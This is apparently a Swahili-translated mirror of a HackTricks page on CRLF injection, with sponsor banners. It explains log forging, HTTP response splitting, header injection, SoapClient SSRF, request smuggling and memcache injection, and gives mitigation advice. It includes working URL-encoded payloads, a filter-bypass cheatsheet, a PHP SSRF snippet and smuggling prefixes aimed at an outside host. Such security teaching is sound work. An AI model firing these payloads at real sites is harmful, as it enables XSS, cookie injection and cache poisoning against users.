mirror of
https://github.com/carlospolop/hacktricks
synced 2024-11-23 13:13:41 +00:00
234 lines
16 KiB
Markdown
234 lines
16 KiB
Markdown
# Uingizaji wa CRLF (%0D%0A)
|
|
|
|
<details>
|
|
|
|
<summary><strong>Jifunze kuhusu kudukua AWS kutoka mwanzo hadi mtaalamu na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (Mtaalamu wa Timu Nyekundu ya AWS ya HackTricks)</strong></a><strong>!</strong></summary>
|
|
|
|
Njia nyingine za kusaidia HackTricks:
|
|
|
|
* Ikiwa unataka kuona **kampuni yako ikitangazwa kwenye HackTricks** au **kupakua HackTricks kwa PDF** Angalia [**MIPANGO YA KUJIUNGA**](https://github.com/sponsors/carlospolop)!
|
|
* Pata [**bidhaa rasmi za PEASS & HackTricks**](https://peass.creator-spring.com)
|
|
* Gundua [**Familia ya PEASS**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa kipekee wa [**NFTs**](https://opensea.io/collection/the-peass-family)
|
|
* **Jiunge na** 💬 [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au [**kikundi cha telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
|
|
* **Shiriki mbinu zako za kudukua kwa kuwasilisha PRs kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github.
|
|
|
|
</details>
|
|
|
|
<figure><img src="../.gitbook/assets/i3.png" alt=""><figcaption></figcaption></figure>
|
|
|
|
**Sawa ya Bug bounty**: **jiandikishe** kwa **Intigriti**, jukwaa la **bug bounty la malipo ya juu lililoanzishwa na wadukuzi, kwa wadukuzi**! Jiunge nasi kwenye [**https://go.intigriti.com/hacktricks**](https://go.intigriti.com/hacktricks) leo, na anza kupata zawadi hadi **$100,000**!
|
|
|
|
{% embed url="https://go.intigriti.com/hacktricks" %}
|
|
|
|
### CRLF
|
|
|
|
Carriage Return (CR) na Line Feed (LF), inayojulikana kwa pamoja kama CRLF, ni mfululizo wa wahusika maalum unaotumiwa katika itifaki ya HTTP kumaanisha mwisho wa mstari au mwanzo wa mstari mpya. Seva za wavuti na vivinjari hutumia CRLF kutofautisha kati ya vichwa vya HTTP na mwili wa jibu. Wahusika hawa hutumiwa kwa pamoja katika mawasiliano ya HTTP/1.1 kwenye aina mbalimbali za seva za wavuti, kama vile Apache na Microsoft IIS.
|
|
|
|
### Uwezekano wa Uingizaji wa CRLF
|
|
|
|
Uingizaji wa CRLF unahusisha kuingiza wahusika wa CR na LF kwenye mwingiliano uliotolewa na mtumiaji. Hatua hii inawadanganya seva, programu, au mtumiaji kufikiria mfululizo ulioingizwa kama mwisho wa jibu moja na mwanzo wa lingine. Ingawa wahusika hawa sio hatari kwa asili yao, matumizi yasiyofaa yanaweza kusababisha kugawanyika kwa majibu ya HTTP na shughuli zingine za uovu.
|
|
|
|
### Mfano: Uingizaji wa CRLF katika Faili ya Kumbukumbu
|
|
|
|
[Mfano kutoka hapa](https://www.invicti.com/blog/web-security/crlf-http-header/)
|
|
|
|
Fikiria faili ya kumbukumbu katika kisanduku cha usimamizi inayofuata muundo: `IP - Wakati - Njia Iliyotembelewa`. Kuingia kawaida kunaweza kuonekana kama:
|
|
```
|
|
123.123.123.123 - 08:15 - /index.php?page=home
|
|
```
|
|
Mshambuliaji anaweza kutumia CRLF injection kudanganya hii logi. Kwa kuingiza herufi za CRLF kwenye ombi la HTTP, mshambuliaji anaweza kubadilisha mwendelezo wa matokeo na kutengeneza viingilio vya logi. Kwa mfano, mfululizo ulioingizwa unaweza kubadilisha kuingilio la logi kuwa:
|
|
```
|
|
/index.php?page=home&%0d%0a127.0.0.1 - 08:15 - /index.php?page=home&restrictedaction=edit
|
|
```
|
|
Hapa, `%0d` na `%0a` wanawakilisha fomu zilizofanywa URL ya CR na LF. Baada ya shambulio, logi itaonyesha kwa njia inayodanganya:
|
|
```
|
|
IP - Time - Visited Path
|
|
|
|
123.123.123.123 - 08:15 - /index.php?page=home&
|
|
127.0.0.1 - 08:15 - /index.php?page=home&restrictedaction=edit
|
|
```
|
|
Mshambuliaji huficha shughuli zao za uovu kwa kufanya ionekane kama vile localhost (kitu kinachotegemewa kawaida ndani ya mazingira ya seva) ndiye aliyetekeleza vitendo hivyo. Seva inachambua sehemu ya ombi linaloanza na `%0d%0a` kama parameter moja, huku parameter ya `restrictedaction` ikichambuliwa kama kuingiza tofauti. Ombi lililobadilishwa linaiga amri halali ya utawala: `/index.php?page=home&restrictedaction=edit`
|
|
|
|
### Kugawanyika kwa Majibu ya HTTP
|
|
|
|
#### Maelezo
|
|
|
|
Kugawanyika kwa Majibu ya HTTP ni udhaifu wa usalama unaotokea wakati mshambuliaji anatumia muundo wa majibu ya HTTP. Muundo huu huchambua vichwa kutoka kwa mwili kwa kutumia mfululizo maalum wa herufi, Carriage Return (CR) ikifuatiwa na Line Feed (LF), vinavyoitwa pamoja kama CRLF. Ikiwa mshambuliaji anafanikiwa kuweka mfululizo wa CRLF kwenye kichwa cha jibu, wanaweza kwa ufanisi kubadilisha maudhui ya jibu linalofuata. Aina hii ya ubadilishaji inaweza kusababisha masuala makubwa ya usalama, haswa Mashambulizi ya Kuvuka Tovuti (XSS).
|
|
|
|
#### XSS kupitia Kugawanyika kwa Majibu ya HTTP
|
|
|
|
1. Programu inaweka kichwa cha desturi kama hiki: `X-Custom-Header: UserInput`
|
|
2. Programu inapata thamani ya `UserInput` kutoka kwa parameter ya ombi, sema "user\_input". Katika hali zisizo na ukaguzi sahihi wa kuingiza na uendeshaji, mshambuliaji anaweza kutengeneza mzigo wa data ambao unajumuisha mfululizo wa CRLF, ukifuatiwa na maudhui mabaya.
|
|
3. Mshambuliaji anatengeneza URL na 'user\_input' iliyoandaliwa kwa kipekee: `?user_input=Value%0d%0a%0d%0a<script>alert('XSS')</script>`
|
|
* Katika URL hii, `%0d%0a%0d%0a` ni fomu iliyohifadhiwa kwa URL ya CRLFCRLF. Inadanganya seva kuweka mfululizo wa CRLF, ikifanya seva itambue sehemu inayofuata kama mwili wa jibu.
|
|
4. Seva inarudisha kuingiza cha mshambuliaji kwenye kichwa cha jibu, ikisababisha muundo usiotarajiwa wa jibu ambapo hati ya uovu inachambuliwa na kivinjari kama sehemu ya mwili wa jibu.
|
|
|
|
#### Mfano wa Kugawanyika kwa Majibu ya HTTP Inayoongoza kwa Uelekezaji
|
|
|
|
Kutoka [https://medium.com/bugbountywriteup/bugbounty-exploiting-crlf-injection-can-lands-into-a-nice-bounty-159525a9cb62](https://medium.com/bugbountywriteup/bugbounty-exploiting-crlf-injection-can-lands-into-a-nice-bounty-159525a9cb62)
|
|
|
|
Kivinjari kwa:
|
|
```
|
|
/%0d%0aLocation:%20http://myweb.com
|
|
```
|
|
Na server inajibu na kichwa:
|
|
```
|
|
Location: http://myweb.com
|
|
```
|
|
**Mfano mwingine: (kutoka** [**https://www.acunetix.com/websitesecurity/crlf-injection/**](https://www.acunetix.com/websitesecurity/crlf-injection/)**)**
|
|
```
|
|
http://www.example.com/somepage.php?page=%0d%0aContent-Length:%200%0d%0a%0d%0aHTTP/1.1%20200%20OK%0d%0aContent-Type:%20text/html%0d%0aContent-Length:%2025%0d%0a%0d%0a%3Cscript%3Ealert(1)%3C/script%3E
|
|
```
|
|
#### Katika Njia ya URL
|
|
|
|
Unaweza kutuma mzigo **ndani ya njia ya URL** ili kudhibiti **jibu** kutoka kwa seva (mfano kutoka [hapa](https://hackerone.com/reports/192667)):
|
|
```
|
|
http://stagecafrstore.starbucks.com/%3f%0d%0aLocation:%0d%0aContent-Type:text/html%0d%0aX-XSS-Protection%3a0%0d%0a%0d%0a%3Cscript%3Ealert%28document.domain%29%3C/script%3E
|
|
http://stagecafrstore.starbucks.com/%3f%0D%0ALocation://x:1%0D%0AContent-Type:text/html%0D%0AX-XSS-Protection%3a0%0D%0A%0D%0A%3Cscript%3Ealert(document.domain)%3C/script%3E
|
|
```
|
|
Pata mifano zaidi katika:
|
|
|
|
{% embed url="https://github.com/EdOverflow/bugbounty-cheatsheet/blob/master/cheatsheets/crlf.md" %}
|
|
|
|
### Uingizaji wa Kichwa cha HTTP
|
|
|
|
Uingizaji wa Kichwa cha HTTP, mara nyingi hutumiwa kupitia uingizaji wa CRLF (Carriage Return and Line Feed), inaruhusu wachomaji kuingiza vichwa vya HTTP. Hii inaweza kudhoofisha mifumo ya usalama kama vile filamu za XSS (Cross-Site Scripting) au SOP (Same-Origin Policy), ikisababisha ufikiaji usioidhinishwa wa data nyeti, kama vile vivuli vya CSRF, au ujanja wa vikao vya mtumiaji kupitia kupanda kuki.
|
|
|
|
#### Kudhoofisha CORS kupitia Uingizaji wa Kichwa cha HTTP
|
|
|
|
Mchomaji anaweza kuingiza vichwa vya HTTP kuwezesha CORS (Cross-Origin Resource Sharing), kukiuka vizuizi vilivyowekwa na SOP. Uvunjaji huu unaruhusu skripti kutoka asili zenye nia mbaya kuingiliana na rasilimali kutoka asili tofauti, ikipata data iliyolindwa.
|
|
|
|
#### SSRF na Uingizaji wa Ombi la HTTP kupitia CRLF
|
|
|
|
Uingizaji wa CRLF unaweza kutumika kutengeneza na kuingiza ombi jipya la HTTP kabisa. Mfano muhimu wa hii ni udhaifu katika darasa la `SoapClient` la PHP, hasa ndani ya parameter ya `user_agent`. Kwa kubadilisha parameter hii, mchomaji anaweza kuingiza vichwa ziada na maudhui ya mwili, au hata kuingiza ombi jipya la HTTP kabisa. Hapa chini ni mfano wa PHP unaodhihirisha uvamizi huu:
|
|
```php
|
|
$target = 'http://127.0.0.1:9090/test';
|
|
$post_string = 'variable=post value';
|
|
$crlf = array(
|
|
'POST /proxy HTTP/1.1',
|
|
'Host: local.host.htb',
|
|
'Cookie: PHPSESSID=[PHPSESSID]',
|
|
'Content-Type: application/x-www-form-urlencoded',
|
|
'Content-Length: '.(string)strlen($post_string),
|
|
"\r\n",
|
|
$post_string
|
|
);
|
|
|
|
$client = new SoapClient(null,
|
|
array(
|
|
'uri'=>$target,
|
|
'location'=>$target,
|
|
'user_agent'=>"IGN\r\n\r\n".join("\r\n",$crlf)
|
|
)
|
|
);
|
|
|
|
# Put a netcat listener on port 9090
|
|
$client->__soapCall("test", []);
|
|
```
|
|
### Kichomekezo cha Kichwa kwa Kuficha Ombi
|
|
|
|
Kwa habari zaidi kuhusu mbinu hii na matatizo yanayoweza kutokea [**angalia chanzo cha asili**](https://portswigger.net/research/making-http-header-injection-critical-via-response-queue-poisoning).
|
|
|
|
Unaweza kuchomeka vichwa muhimu ili kuhakikisha **seva ya nyuma inaendelea kuweka uhusiano wazi** baada ya kujibu ombi la awali:
|
|
```
|
|
GET /%20HTTP/1.1%0d%0aHost:%20redacted.net%0d%0aConnection:%20keep-alive%0d%0a%0d%0a HTTP/1.1
|
|
```
|
|
Baadaye, ombi la pili linaweza kutajwa. Hali hii kawaida inahusisha [smuggling ya ombi la HTTP](http-request-smuggling/), mbinu ambapo vichwa vya ziada au vipengele vya mwili vilivyowekwa na seva baada ya kuingiza vinaweza kusababisha matumizi mbalimbali ya usalama.
|
|
|
|
**Udanganyifu:**
|
|
|
|
1. **Uingizaji wa Awali wa Madhara**: Mbinu hii inahusisha kudhuru ombi la mtumiaji au cache ya wavuti kwa kutaja awali yenye madhara. Mfano wa hii ni:
|
|
|
|
`GET /%20HTTP/1.1%0d%0aHost:%20redacted.net%0d%0aConnection:%20keep-alive%0d%0a%0d%0aGET%20/redirplz%20HTTP/1.1%0d%0aHost:%20oastify.com%0d%0a%0d%0aContent-Length:%2050%0d%0a%0d%0a HTTP/1.1`
|
|
|
|
2. **Kuunda Awali kwa Kupotosha Safu ya Majibu**: Mbinu hii inahusisha kuunda awali ambayo, pamoja na takataka za mwisho, inaunda ombi la pili kamili. Hii inaweza kusababisha kupotosha kwa safu ya majibu. Mfano ni:
|
|
|
|
`GET /%20HTTP/1.1%0d%0aHost:%20redacted.net%0d%0aConnection:%20keep-alive%0d%0a%0d%0aGET%20/%20HTTP/1.1%0d%0aFoo:%20bar HTTP/1.1`
|
|
|
|
### Uingizaji wa Memcache
|
|
|
|
Memcache ni **hifadhidata ya funguo-na-thamani inayotumia itifaki ya maandishi wazi**. Taarifa zaidi katika:
|
|
|
|
{% content-ref url="../network-services-pentesting/11211-memcache/" %}
|
|
[11211-memcache](../network-services-pentesting/11211-memcache/)
|
|
{% endcontent-ref %}
|
|
|
|
**Kwa habari kamili soma** [**andishi la awali**](https://www.sonarsource.com/blog/zimbra-mail-stealing-clear-text-credentials-via-memcache-injection/)
|
|
|
|
Ikiwa jukwaa linachukua **data kutoka kwa ombi la HTTP na kuitumia bila kuisafisha** kufanya **ombi** kwa **seva ya memcache**, mshambuliaji anaweza kutumia tabia hii kuingiza **amri mpya za memcache**.
|
|
|
|
Kwa mfano, katika udhaifu uliogunduliwa awali, funguo za cache zilitumika kurudisha anwani ya IP na bandari ambayo mtumiaji anapaswa kuunganisha, na wadukuzi walikuwa na uwezo wa **kuingiza amri za memcache** ambazo zingepotosha **cache kutuma maelezo ya waathiriwa** (majina ya watumiaji na nywila zilizojumuishwa) kwa seva ya mshambuliaji:
|
|
|
|
<figure><img src="../.gitbook/assets/image (656).png" alt="https://assets-eu-01.kc-usercontent.com/d0f02280-9dfb-0116-f970-137d713003b6/ba72cd16-2ca0-447b-aa70-5cde302a0b88/body-578d9f9f-1977-4e34-841c-ad870492328f_10.png?w=1322&h=178&auto=format&fit=crop"><figcaption></figcaption></figure>
|
|
|
|
Zaidi ya hayo, watafiti pia waligundua kwamba wangeweza kusawazisha majibu ya memcache kutuma anwani za IP na bandari za wadukuzi kwa watumiaji ambao barua pepe za wadukuzi hawakujua:
|
|
|
|
<figure><img src="../.gitbook/assets/image (634).png" alt="https://assets-eu-01.kc-usercontent.com/d0f02280-9dfb-0116-f970-137d713003b6/c6c1f3c4-d244-4bd9-93f7-2c88f139acfa/body-3f9ceeb9-3d6b-4867-a23f-e0e50a46a2e9_14.png?w=1322&h=506&auto=format&fit=crop"><figcaption></figcaption></figure>
|
|
|
|
### Jinsi ya Kuzuia Uingizaji wa CRLF / Vichwa vya HTTP katika Maombi ya Wavuti
|
|
|
|
Ili kupunguza hatari za Uingizaji wa CRLF (Carriage Return na Line Feed) au Vichwa vya HTTP katika maombi ya wavuti, mikakati ifuatayo inapendekezwa:
|
|
|
|
1. **Epuka Kuingiza Moja kwa Moja ya Ingizo la Mtumiaji katika Vichwa vya Majibu:** Njia salama zaidi ni kujiepusha na kuingiza moja kwa moja ingizo linalotolewa na mtumiaji moja kwa moja katika vichwa vya majibu.
|
|
2. **Kodisha Herufi Maalum:** Ikiwa kuepuka kuingiza moja kwa moja ya ingizo la mtumiaji sio jambo linalowezekana, hakikisha kutumia kazi maalum ya kuweka herufi maalum kama CR (Carriage Return) na LF (Line Feed). Mazoea haya yanazuia uwezekano wa uingizaji wa CRLF.
|
|
3. **Sasisha Lugha ya Programu:** Sasisha mara kwa mara lugha ya programu inayotumiwa katika maombi yako ya wavuti hadi toleo jipya zaidi. Chagua toleo linalozuia kwa asili uingizaji wa herufi za CR na LF ndani ya kazi zinazohusika na kuweka vichwa vya HTTP.
|
|
|
|
### CHEATSHEET
|
|
|
|
[Cheatsheet kutoka hapa](https://twitter.com/NinadMishra5/status/1650080604174667777)
|
|
```
|
|
1. HTTP Response Splitting
|
|
• /%0D%0ASet-Cookie:mycookie=myvalue (Check if the response is setting this cookie)
|
|
|
|
2. CRLF chained with Open Redirect
|
|
• //www.google.com/%2F%2E%2E%0D%0AHeader-Test:test2
|
|
• /www.google.com/%2E%2E%2F%0D%0AHeader-Test:test2
|
|
• /google.com/%2F..%0D%0AHeader-Test:test2
|
|
• /%0d%0aLocation:%20http://example.com
|
|
|
|
3. CRLF Injection to XSS
|
|
• /%0d%0aContent-Length:35%0d%0aX-XSS-Protection:0%0d%0a%0d%0a23
|
|
• /%3f%0d%0aLocation:%0d%0aContent-Type:text/html%0d%0aX-XSS-Protection%3a0%0d%0a%0d%0a%3Cscript%3Ealert%28document.domain%29%3C/script%3E
|
|
|
|
4. Filter Bypass
|
|
• %E5%98%8A = %0A = \u560a
|
|
• %E5%98%8D = %0D = \u560d
|
|
• %E5%98%BE = %3E = \u563e (>)
|
|
• %E5%98%BC = %3C = \u563c (<)
|
|
• Payload = %E5%98%8A%E5%98%8DSet-Cookie:%20test
|
|
```
|
|
## Vifaa vya Kiotomatiki
|
|
|
|
* [https://github.com/Raghavd3v/CRLFsuite](https://github.com/Raghavd3v/CRLFsuite)
|
|
* [https://github.com/dwisiswant0/crlfuzz](https://github.com/dwisiswant0/crlfuzz)
|
|
|
|
## Orodha ya Kugundua Nguvu ya Kuforce
|
|
|
|
* [https://github.com/carlospolop/Auto\_Wordlists/blob/main/wordlists/crlf.txt](https://github.com/carlospolop/Auto\_Wordlists/blob/main/wordlists/crlf.txt)
|
|
|
|
## Marejeo
|
|
|
|
* [**https://www.invicti.com/blog/web-security/crlf-http-header/**](https://www.invicti.com/blog/web-security/crlf-http-header/)
|
|
* [**https://www.acunetix.com/websitesecurity/crlf-injection/**](https://www.acunetix.com/websitesecurity/crlf-injection/)
|
|
* [**https://portswigger.net/research/making-http-header-injection-critical-via-response-queue-poisoning**](https://portswigger.net/research/making-http-header-injection-critical-via-response-queue-poisoning)
|
|
* [**https://www.netsparker.com/blog/web-security/crlf-http-header/**](https://www.netsparker.com/blog/web-security/crlf-http-header/)
|
|
|
|
<figure><img src="../.gitbook/assets/i3.png" alt=""><figcaption></figcaption></figure>
|
|
|
|
**Mwongozo wa tuzo ya mdudu**: **jiandikishe** kwa **Intigriti**, jukwaa la tuzo la mdudu la malipo lililoundwa na wadukuzi, kwa wadukuzi! Jiunge nasi kwenye [**https://go.intigriti.com/hacktricks**](https://go.intigriti.com/hacktricks) leo, na anza kupata tuzo hadi **$100,000**!
|
|
|
|
{% embed url="https://go.intigriti.com/hacktricks" %}
|
|
|
|
<details>
|
|
|
|
<summary><strong>Jifunze kuhusu kudukua AWS kutoka sifuri hadi shujaa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
|
|
|
Njia nyingine za kusaidia HackTricks:
|
|
|
|
* Ikiwa unataka kuona **kampuni yako ikitangazwa kwenye HackTricks** au **kupakua HackTricks kwa PDF** Angalia [**MIPANGO YA KUJIUNGA**](https://github.com/sponsors/carlospolop)!
|
|
* Pata [**bidhaa rasmi za PEASS & HackTricks**](https://peass.creator-spring.com)
|
|
* Gundua [**Familia ya PEASS**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa [**NFTs**](https://opensea.io/collection/the-peass-family) ya kipekee
|
|
* **Jiunge na** 💬 [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au kikundi cha [**telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
|
|
* **Shiriki mbinu zako za kudukua kwa kuwasilisha PRs kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
|
|
|
|
</details>
|